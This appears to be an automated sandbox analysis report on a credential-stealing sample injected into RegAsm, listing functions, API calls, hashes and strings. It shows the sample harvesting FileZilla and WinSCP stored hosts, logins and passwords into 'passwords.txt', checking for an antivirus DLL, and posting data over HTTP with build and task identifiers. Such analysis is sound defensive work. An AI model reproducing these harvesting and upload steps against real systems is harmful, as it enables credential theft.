Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 4bfc7f3a1a8a3a1527654146c9320ce43d310d9ab8ed8f72107cfce81371fc7a
Instruction ID: 22c294074c5d62442992e60e90eb1915abbf1afd0740e8f1a8d41b11c294079d
Opcode Fuzzy Hash: 4bfc7f3a1a8a3a1527654146c9320ce43d310d9ab8ed8f72107cfce81371fc7a
Instruction Fuzzy Hash: ADF0B4706013146BD700ABB8AC49BAB7BAAAB05725F100296F511D72D0DF74AD848B99

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 61E75F1F Relevance: 3.3, Strings: 2, Instructions: 815COMMON

Download Yara Rule

Strings

multiple recursive references: %s, xrefs: 61E76A4B
recursive reference in a subquery: %s, xrefs: 61E76A54

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID: multiple recursive references: %s$recursive reference in a subquery: %s
API String ID: 0-3854365051
Opcode ID: 8a26e64de976ae8fb016dbfc0a5eb26d0663afd63c0e3b8ade1548b48d62a297
Instruction ID: 7d5e909c26c2478cc4d8a1152a5e5b16c7ea0641b558a5fde8b477d39de8e8ad
Opcode Fuzzy Hash: 8a26e64de976ae8fb016dbfc0a5eb26d0663afd63c0e3b8ade1548b48d62a297
Instruction Fuzzy Hash: 4E8207B4A052899FEB25CFA8C180B9DBBF1BF48308F24C559E859AB355D734E846CF50

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 0ef1b6915252f64a71f5f8716fc261129478f39d20de27c14b1611174eafaffd
Instruction ID: ce780d127ab37b21b0e6681e3c4d86180196aab402ae917bd7378eaa8dd1ef03
Opcode Fuzzy Hash: 0ef1b6915252f64a71f5f8716fc261129478f39d20de27c14b1611174eafaffd
Instruction Fuzzy Hash: 6EE06D70D5020D9BCB00DF60EC85ADEBBFCEB08204F0050B59505A3180DA70AB898F88

Function 61E4B8A1 Relevance: 1.6, APIs: 1, Instructions: 323COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4BBA6

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 516c7da196c91c56f608f5042f93d451d14bb0a4fe880775d5f0088f7b4adc6f
Instruction ID: 0d30bdf3ca1535cc6e9debfec2a3fa3a34d16498aff86589297f71c0a5a37c1e
Opcode Fuzzy Hash: 516c7da196c91c56f608f5042f93d451d14bb0a4fe880775d5f0088f7b4adc6f
Instruction Fuzzy Hash: 7DC15D30E082858BEB15CFA8E4D079D7AF1AF8831CF29C46DD8469B349EB74D885CB51

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418441), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004166FB,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,004368E7,004368E6,004368D3,004368D2), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416DAB: CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
Part of subcall function 00416DAB: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

Strings

<Pass encoding="base64">, xrefs: 0040E88A
Login: , xrefs: 0040E98C
<Port>, xrefs: 0040E818
passwords.txt, xrefs: 0040EA4D
Soft: FileZilla, xrefs: 0040E948
Host: , xrefs: 0040E954
<Host>, xrefs: 0040E7D9
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
<User>, xrefs: 0040E851
Password: , xrefs: 0040E9AE

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: 02c9750924e3bbf65dca47e395fb2c423d2687a2ad46242f290b28d83e3cdae9
Instruction ID: aeeb8d238bb5b7a96a8f0db35cdc2e6b39a68eaef9205eb22d71b210d60ddda6
Opcode Fuzzy Hash: 02c9750924e3bbf65dca47e395fb2c423d2687a2ad46242f290b28d83e3cdae9
Instruction Fuzzy Hash: BCA16272E40319AFCF11FBA1DD4AADD7B79AF08305F104466F501B3091DBB8AE498B98

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 004073FF
", xrefs: 004074DD
------, xrefs: 00407145
0076b6a02eb028dde461f6494f955b49, xrefs: 004070ED
", xrefs: 004070C1
------, xrefs: 00406FE3
build_id, xrefs: 00407095
status, xrefs: 004074B1
", xrefs: 00406F61
------, xrefs: 0040729F
------, xrefs: 00406E82
", xrefs: 0040737D
", xrefs: 0040721D
task_id, xrefs: 00407351
mode, xrefs: 004071F1
------, xrefs: 00406CFC

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$0076b6a02eb028dde461f6494f955b49$build_id$mode$status$task_id
API String ID: 3702379033-2806329188
Opcode ID: 0a818684019b054137d4495a79912f53f8800cd55546a260e260faa9fc01be6d
Instruction ID: 249a9a8e6f1141dab085295f2f4f7f4ed52dd62519d0b61e543dc3ecd85d430e
Opcode Fuzzy Hash: 0a818684019b054137d4495a79912f53f8800cd55546a260e260faa9fc01be6d
Instruction Fuzzy Hash: 7452A77194016D9ACF61EB62CD46BCCB7B5AF04308F4184E7A60D73161DA746FCA8FA8

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,0076b6a02eb028dde461f6494f955b49,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 00406445
", xrefs: 004065A1
------, xrefs: 00406080
0076b6a02eb028dde461f6494f955b49, xrefs: 00406471
", xrefs: 004062E5
------, xrefs: 00406367
build_id, xrefs: 00406419
------, xrefs: 00406206
------, xrefs: 004064C9
mode, xrefs: 00406575

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$0076b6a02eb028dde461f6494f955b49$build_id$mode
API String ID: 3702379033-2380318854
Opcode ID: 64b3b548bffbbd511966b56b0c437e38be4e106e717a0c39a253489c62132b73
Instruction ID: e05a5c92b84e7ce0adfcf1a78c26f0ca7403e0ab721f1325e353ecf4dcdb6f2f
Opcode Fuzzy Hash: 64b3b548bffbbd511966b56b0c437e38be4e106e717a0c39a253489c62132b73
Instruction Fuzzy Hash: 3D2298719402699BCF21EB61CD46BCDB7B5AF04304F4144E7A60D73161DAB46ECA8F98

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368CD), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

passwords.txt, xrefs: 0040E662
Password, xrefs: 0040E515
Password: , xrefs: 0040E529
Host: , xrefs: 0040E32A
HostName, xrefs: 0040E367
Soft: WinSCP, xrefs: 0040E2FE
UseMasterPassword, xrefs: 0040E24E
PortNumber, xrefs: 0040E3BD
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
:22, xrefs: 0040E42D
Login: , xrefs: 0040E459
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
UserName, xrefs: 0040E496
Security, xrefs: 0040E253

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 7909e5200ba02aeff354f9b0a7b110f88fc875b0e6ff90bca08ee5caedaf9b80
Instruction ID: 186245a2e0c0575b7c501e816c7078e961625ed90228c8a08f29ae5731911bb6
Opcode Fuzzy Hash: 7909e5200ba02aeff354f9b0a7b110f88fc875b0e6ff90bca08ee5caedaf9b80
Instruction Fuzzy Hash: 04D1E6B195012DAEDB20EB95DC82BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00418540 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418581
GetProcAddress.KERNEL32 ref: 00418598
GetProcAddress.KERNEL32 ref: 004185AF
GetProcAddress.KERNEL32 ref: 004185C6
GetProcAddress.KERNEL32 ref: 004185DD
GetProcAddress.KERNEL32 ref: 004185F4
